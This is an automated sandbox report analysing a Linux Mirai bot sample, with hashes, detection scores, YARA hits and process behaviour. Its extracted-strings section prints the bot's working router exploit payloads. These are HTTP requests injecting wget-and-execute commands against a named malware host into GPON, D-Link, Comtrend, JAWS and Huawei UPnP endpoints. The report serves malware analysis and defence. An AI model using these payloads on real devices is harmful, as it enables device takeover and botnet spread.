Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
w9J4jyf7oY

Overview

General Information

Sample Name:w9J4jyf7oY
Analysis ID:679627
MD5:bb2f72c63c8c0427d31a757dfa190260
SHA1:035b12d2be4f11e9ebe390aadab1205a599c6432
SHA256:2e717964f7f88a60459e708ac92be181d0c3899fd3ce6b60c34624b0402f78a0
Tags:32elfmiraimotorola
Infos:

Detection

Mirai
Score:64
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected Mirai
Multi AV Scanner detection for submitted file
Yara signature match
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Sample listens on a socket
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

Static ELF header machine description suggests that the sample might not execute correctly on this machine.
Joe Sandbox Version:35.0.0 Citrine
Analysis ID:679627
Start date and time: 06/08/202207:13:572022-08-06 07:13:57 +02:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 17s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:w9J4jyf7oY
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal64.troj.lin@0/0@0/0
  • VT rate limit hit for: http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VI
Command:/tmp/w9J4jyf7oY
PID:6219
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Connected To CNC
Standard Error:
  • system is lnxubuntu20
  • cleanup
SourceRuleDescriptionAuthorStrings
w9J4jyf7oYSUSP_XORed_MozillaDetects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.Florian Roth
  • 0x1c112:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x1c182:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x1c1f2:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x1c261:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x1c2d0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x1c538:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x1c58b:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x1c5de:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x1c631:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x1c685:$xo1: oMXKNNC\x0D\x17\x0C\x12
w9J4jyf7oYJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    SourceRuleDescriptionAuthorStrings
    6222.1.00007fac24021000.00007fac24022000.rw-.sdmpSUSP_XORed_MozillaDetects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.Florian Roth
    • 0x584:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x5f8:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x66c:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x6e0:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x754:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x9d4:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xa2c:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xa84:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xadc:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xb34:$xo1: oMXKNNC\x0D\x17\x0C\x12
    6219.1.00007fac2401f000.00007fac24021000.rw-.sdmpSUSP_XORed_MozillaDetects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.Florian Roth
    • 0x112:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x182:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x1f2:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x261:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x2d0:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x538:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x58b:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x5de:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x631:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x685:$xo1: oMXKNNC\x0D\x17\x0C\x12
    6222.1.00007fac2401f000.00007fac24021000.rw-.sdmpSUSP_XORed_MozillaDetects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.Florian Roth
    • 0x112:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x182:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x1f2:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x261:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x2d0:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x538:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x58b:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x5de:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x631:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x685:$xo1: oMXKNNC\x0D\x17\x0C\x12
    6219.1.00007fac24021000.00007fac24022000.rw-.sdmpSUSP_XORed_MozillaDetects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.Florian Roth
    • 0x584:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x5f8:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x66c:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x6e0:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x754:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x9d4:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xa2c:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xa84:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xadc:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xb34:$xo1: oMXKNNC\x0D\x17\x0C\x12
    6222.1.00007fac24001000.00007fac2401e000.r-x.sdmpSUSP_XORed_MozillaDetects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.Florian Roth
    • 0x1c112:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x1c182:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x1c1f2:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x1c261:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x1c2d0:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x1c538:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x1c58b:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x1c5de:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x1c631:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x1c685:$xo1: oMXKNNC\x0D\x17\x0C\x12
    Click to see the 3 entries
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: w9J4jyf7oYAvira: detected
    Source: w9J4jyf7oYVirustotal: Detection: 58%Perma Link
    Source: w9J4jyf7oYReversingLabs: Detection: 62%
    Source: /tmp/w9J4jyf7oY (PID: 6219)Socket: 127.0.0.1::44455Jump to behavior
    Source: w9J4jyf7oYString found in binary or memory: http://0.0.0.0/Cloud/Cloud.x86
    Source: w9J4jyf7oYString found in binary or memory: http://46.23.109.47/Cloud/Cloud.mips;
    Source: w9J4jyf7oYString found in binary or memory: http://46.23.109.47/Cloud/Cloud.mpsl;chmod
    Source: w9J4jyf7oYString found in binary or memory: http://46.23.109.47/Cloud/Cloud.x86
    Source: w9J4jyf7oYString found in binary or memory: http://46.23.109.47/Cloud/Comtrend.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114
    Source: w9J4jyf7oYString found in binary or memory: http://46.23.109.47/Cloud/Dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$
    Source: w9J4jyf7oYString found in binary or memory: http://46.23.109.47/Cloud/Gpon.sh
    Source: w9J4jyf7oYString found in binary or memory: http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VI
    Source: w9J4jyf7oYString found in binary or memory: http://purenetworks.com/HNAP1/
    Source: w9J4jyf7oYString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: w9J4jyf7oYString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
    Source: w9J4jyf7oY, type: SAMPLEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
    Source: 6222.1.00007fac24021000.00007fac24022000.rw-.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
    Source: 6219.1.00007fac2401f000.00007fac24021000.rw-.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
    Source: 6222.1.00007fac2401f000.00007fac24021000.rw-.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
    Source: 6219.1.00007fac24021000.00007fac24022000.rw-.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
    Source: 6222.1.00007fac24001000.00007fac2401e000.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
    Source: 6219.1.00007fac24001000.00007fac2401e000.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
    Source: Initial samplePotential command found: GET oV
    Source: Initial samplePotential command found: GET /ping.cgi?pingIpAddress=google.fr;wget%20http://46.23.109.47/Cloud/Comtrend.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114'$ HTTP/1.1
    Source: Initial samplePotential command found: GET /login.cgi?cli=aa%20aa%27;wget%20http://46.23.109.47/Cloud/Dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1
    Source: Initial samplePotential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+46.23.109.47/Cloud/Jaws.sh;chmod+777+*;sh+Jaws.sh HTTP/1.1
    Source: Initial samplePotential command found: GET /boaform/admin/formPing?target_addr=;wget%20http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
    Source: Initial samplePotential command found: GET /index.php?s=/index/hink
    Source: ELF static info symbol of initial sample.symtab present: no
    Source: Initial sampleString containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+vaicalon;chmod+777+*;sh+vaicalon`&ipv=0
    Source: Initial sampleString containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+anngu;chmod+777+*;sh+anngu`&ipv=0
    Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://46.23.109.47/Cloud/Cloud.mips; chmod 777 Cloud.mips; ./Cloud.mips Cloud.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: Initial sampleString containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+vaicalon;chmod+777+*;sh+vaicalon`&ipv=0POST /GponForm/diag_Form?images/ HTTP/1.1
    Source: Initial sampleString containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+anngu;chmod+777+*;sh+anngu`&ipv=0POST /HNAP1/ HTTP/1.0
    Source: classification engineClassification label: mal64.troj.lin@0/0@0/0
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/6230/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/6231/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/1582/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/2033/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/2275/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/3088/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/6191/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/6190/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/1612/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/1579/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/1699/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/1335/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/1698/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/2028/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/1334/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/1576/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/2302/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/3236/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/2025/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/2146/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/910/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/6227/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/912/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/6229/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/517/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/759/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/6228/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/2307/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/918/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/6241/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/6243/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/4462/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/6245/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/6246/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/1594/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/2285/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/2281/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/1349/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/1623/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/761/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/1622/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/884/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/1983/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/2038/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/1344/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/1465/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/1586/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/1463/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/2156/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/800/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/6238/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/801/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/6237/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/1629/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/1627/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/1900/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/6252/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/4470/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/4471/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/6254/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/3021/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/491/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/2294/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/2050/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/1877/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/772/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/1633/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/1599/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/1632/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/774/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/1477/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/654/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/896/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/1476/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/1872/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/2048/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/655/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/1475/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/2289/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/656/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/777/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/657/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/6249/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/658/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/6248/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/4468/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/4469/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/4502/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/419/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/936/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/1639/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/1638/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/2208/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/2180/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/1809/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/1494/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/1890/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/2063/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/2062/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/1888/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/1886/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/420/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/1489/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/785/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6221)File opened: /proc/1642/exeJump to behavior
    Source: /tmp/w9J4jyf7oY (PID: 6219)Queries kernel information via 'uname': Jump to behavior
    Source: w9J4jyf7oY, 6219.1.00007ffeb0ce0000.00007ffeb0d01000.rw-.sdmp, w9J4jyf7oY, 6222.1.00007ffeb0ce0000.00007ffeb0d01000.rw-.sdmpBinary or memory string: /usr/bin/qemu-m68k
    Source: w9J4jyf7oY, 6219.1.0000560d943cf000.0000560d94454000.rw-.sdmp, w9J4jyf7oY, 6222.1.0000560d943cf000.0000560d94454000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/m68k
    Source: w9J4jyf7oY, 6219.1.00007ffeb0ce0000.00007ffeb0d01000.rw-.sdmp, w9J4jyf7oY, 6222.1.00007ffeb0ce0000.00007ffeb0d01000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-m68k/tmp/w9J4jyf7oYSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/w9J4jyf7oY
    Source: w9J4jyf7oY, 6219.1.0000560d943cf000.0000560d94454000.rw-.sdmp, w9J4jyf7oY, 6222.1.0000560d943cf000.0000560d94454000.rw-.sdmpBinary or memory string: V!/etc/qemu-binfmt/m68k

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: w9J4jyf7oY, type: SAMPLE
    Source: Yara matchFile source: 6222.1.00007fac24001000.00007fac2401e000.r-x.sdmp, type: MEMORY
    Source: Yara matchFile source: 6219.1.00007fac24001000.00007fac2401e000.r-x.sdmp, type: MEMORY

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: w9J4jyf7oY, type: SAMPLE
    Source: Yara matchFile source: 6222.1.00007fac24001000.00007fac2401e000.r-x.sdmp, type: MEMORY
    Source: Yara matchFile source: 6219.1.00007fac24001000.00007fac2401e000.r-x.sdmp, type: MEMORY
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts1
    Command and Scripting Interpreter
    Path InterceptionPath InterceptionDirect Volume Access1
    OS Credential Dumping
    11
    Security Software Discovery
    Remote ServicesData from Local SystemExfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    No configs have been found
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Number of created Files
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 679627 Sample: w9J4jyf7oY Startdate: 06/08/2022 Architecture: LINUX Score: 64 23 Antivirus / Scanner detection for submitted sample 2->23 25 Multi AV Scanner detection for submitted file 2->25 27 Yara detected Mirai 2->27 7 w9J4jyf7oY 2->7         started        process3 process4 9 w9J4jyf7oY 7->9         started        11 w9J4jyf7oY 7->11         started        13 w9J4jyf7oY 7->13         started        process5 15 w9J4jyf7oY 9->15         started        17 w9J4jyf7oY 9->17         started        19 w9J4jyf7oY 9->19         started        21 11 other processes 9->21
    SourceDetectionScannerLabelLink
    w9J4jyf7oY58%VirustotalBrowse
    w9J4jyf7oY62%ReversingLabsLinux.Trojan.Mirai
    w9J4jyf7oY100%AviraLINUX/Mirai.bonb
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://46.23.109.47/Cloud/Gpon.sh19%VirustotalBrowse
    http://46.23.109.47/Cloud/Gpon.sh100%Avira URL Cloudmalware
    http://46.23.109.47/Cloud/Cloud.x8618%VirustotalBrowse
    http://46.23.109.47/Cloud/Cloud.x86100%Avira URL Cloudmalware
    http://46.23.109.47/Cloud/Comtrend.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114100%Avira URL Cloudmalware
    http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VI100%Avira URL Cloudmalware
    http://46.23.109.47/Cloud/Cloud.mpsl;chmod100%Avira URL Cloudmalware
    http://46.23.109.47/Cloud/Cloud.mips;100%Avira URL Cloudmalware
    http://purenetworks.com/HNAP1/0%URL Reputationsafe
    http://0.0.0.0/Cloud/Cloud.x860%Avira URL Cloudsafe
    http://46.23.109.47/Cloud/Dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$100%Avira URL Cloudmalware
    No contacted domains info
    NameSourceMaliciousAntivirus DetectionReputation
    http://46.23.109.47/Cloud/Gpon.shw9J4jyf7oYtrue
    • 19%, Virustotal, Browse
    • Avira URL Cloud: malware
    unknown
